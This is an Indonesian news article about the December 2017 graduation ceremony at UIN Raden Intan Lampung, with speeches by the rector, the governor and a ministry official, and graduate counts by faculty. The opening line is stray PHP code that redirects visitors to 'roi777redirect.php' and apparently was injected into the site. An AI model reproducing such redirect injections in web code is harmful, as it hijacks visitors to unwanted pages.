header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Ridho Hadiri Wisuda di UIN Raden Intan -
Ridho Hadiri Wisuda di UIN Raden Intan

TRANSLAMPUNG.COM, BANDARLAMPUNG – Sidang senat terbuka wisuda program sarjana dan pascasarjana periode III tahun 2017 UIN Raden Intan Lampung di GSG UIN, dihadiri sejumlah pejabat negara dan beberapa tokoh, Rabu (13/12).

Hadir Gubernur Lampung M. Ridho Ficardo, M.Si; Sekjen Kementerian Agama (Kemenag) RI Prof. Dr. Nur Syam, M.Si; Kepala Kantor Wilayah Kemenag Provinsi Lampung Suhaili,M.Ag; Rektor pertama IAIN (UIN) Raden Intan Lampung Drs. Mochtar Hasan; Ketua PWNU Lampung KH. Soleh Bajuri dan sejumlah undangan.

Rektor UIN Raden Intan Lampung Prof. Dr. Moh. Mukri, M.Ag menyampaikan terima kasih kepada Gubernur Lampung, Sekjen Kemenag RI dan undangan lainnya yang berkesempatan hadir pada acara tersebut.

“Terima kasih kepada Pak Gubernur yang telah hadir pada acara ini dan selalu memperhatikan serta mendukung perkembangan UIN Raden Intan Lampung. Kepada Pak Sekjen juga terima kasih telah menyempatkan hadir, saya juga selalu meminta arahan dan bimbingan dari beliau (Sekjen) sehingga kampus ini dapat terus berkembang,” ujar Rektor dalam sambutan sidang senat terbuka tersebut.

Mukri juga berpesan kepada para wisudawan untuk menjadi pribadi unggul.

“Jadilah pribadi yang memberi manfaat untuk diri sendiri, keluarga, bangsa, negara dan agama. Jangan pernah bangga ketika telah menjadi sarjana, buktikan ilmu pengetahuan dan pengalaman selama ini dengan  pengabdian di dalam masyarakat,” terangnya.

Sementara, Gubernur Lampung juga menyampaikan ucapan selamat kepada para wisudawan. Ia berharap para alumni UIN dapat bermanfaat dan berkontribusi dalam pembangunan Provinsi Lampung yang berkarakter.

“Semoga harapan dan cita-cita saudara (wisudawan) dapat bermanfaat dan menjadi kebanggaan dari UIN Raden Intan Lampung. Pastikan kiprah saudara untuk lebih baik lagi. Semoga UIN semakin unggul dan kompetitif, sehingga menghasilkan sumber daya yang baik untuk kemajuan provinsi Lampung,” ungkap Ridho.

Hal serupa juga di sampaikan Sekjen Kemenag RI. “Selamat kepada UIN Raden Intan. Setiap saya ke sini selalu ada kemajuan dan capaian yang baru. Selamat juga untuk para wisudawan. Semoga ilmunya ini bisa bermanfaat demi mewujudkan Islam yang damai, Islam yang Wasathiyah, Islam Rahmatan Lil ‘Alamin,” terang Nur Syam.

Menurut Nur Syam, pendidikan ini sangat penting karena pendidikan instrumen terbaik dalam rangka mengembangkan SDM. “Pendidikan merupakan instrumen terbaik dalam membangun peradaban. Bukan hanya Indonesia tapi juga dunia,” tukasnya.

Berdasarkan SK Rektor UIN Raden Intan Lampung nomor 658 tahun 2017 tentang wisudawan program sarjana dan program pascasarjana UIN Raden Intan Lampung Periode III Tahun 2017, ada sebanyak 660 wisudawan pada wisuda kali ini. Jumlah tersebut terdiri atas program sarjana (S1) dan program pascasarjana (S2-S3).

Untuk program S1, pada wisuda kali ini Fakultas Tarbiyah dan Keguruan (FTK) meluluskan 301 wisudawan, Fakultas Syari’ah (FS) 70 wisudawan, Fakultas Ushuluddin dan Studi Agama (FUSA) 51 wisudawan, Fakultas Dakwah dan Ilmu Komunikasi (FDIK) 67 wisudawan, Fakultas Ekonomi dan Bisnis Islam (FEBI) 86 wisudawan. Sedangkan program pascasarjana,  program S2 sebanyak 79 wisudawan dan program S3 6 wisudawan. (r4/rus)

News Reporter